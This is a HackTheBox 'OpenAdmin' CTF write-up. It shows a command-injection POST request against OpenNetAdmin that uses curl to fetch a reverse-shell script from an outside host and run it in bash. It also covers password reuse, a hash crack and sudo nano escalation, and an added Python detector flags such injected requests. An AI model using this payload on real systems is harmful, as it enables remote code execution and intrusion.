f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

HTB{openadmin}

http://10.10.10.171/

Recon

http://10.10.10.171/ona/

Open admin is here.

POST /ona/ HTTP/1.1
Host: 10.10.10.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.171/ona/
Method: POST http://10.10.10.171/ona/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Connection: close
Cookie: ona_context_name=DEFAULT; ONA_SESSION_ID=4aerblt73idp6e282pgkllshv9
Cache-Control: max-age=0

xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh > /tmp/f4d3.sh;bash /tmp/f4d3.sh%26&xajaxargs[]=ping

Got shell!
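From the defender's side, the request above is easy to spot in captured POST bodies. This added example (not part of the original write-up) decodes the `xajaxargs[]` values and flags shell metacharacters after the `name=>` prefix. The `name=>value` argument layout and the benign body are assumptions built from the request shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Characters that should never appear in an IP/hostname argument.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(")

def xajax_args(body):
    """Return the decoded xajaxargs[] values of a form-urlencoded body."""
    args = []
    # Split on the raw '&' first: an encoded %26 inside a value must not
    # be treated as a field separator, so decoding happens per field.
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "xajaxargs[]":
            args.append(unquote_plus(value))
    return args

def suspicious_args(body):
    """Return (argument, metacharacters) for each argument that looks injected."""
    hits = []
    for arg in xajax_args(body):
        # Assumed layout: "name=>value". The '>' of the "=>" marker is
        # legitimate, so only the part after it is inspected.
        _, sep, rest = arg.partition("=>")
        candidate = rest if sep else arg
        found = sorted(set(SHELL_META.findall(candidate)))
        if found:
            hits.append((arg, found))
    return hits

# Body of the request shown on this page.
PAGE_BODY = ("xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips"
             "&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh"
             " > /tmp/f4d3.sh;bash /tmp/f4d3.sh%26&xajaxargs[]=ping")

# Constructed benign body (assumed shape of a normal ping tooltip request).
BENIGN_BODY = ("xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips"
               "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping")

if __name__ == "__main__":
    for name, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY)):
        for arg, meta in suspicious_args(body):
            print(f"[{name}] ALERT metacharacters {meta} in {arg!r}")
```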

In www/local/config/database_settings.php

21232f297a57a5a743894a0e4a801fc3	md5	admin
098f6bcd4621d373cade4e832627b4f6	md5	test

These are useless, but we can reuse the DB password as jimmy :D

We do a port forward…

The hash

00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
crack => Revealed

user.txt:c9b2cf07d40807e62af62660f0c81b5f

Root

For root, we see that we can run nano with sudo :D

GTFOBINS

root.txt:2f907ed450b361b2c2bf4e8795d5b561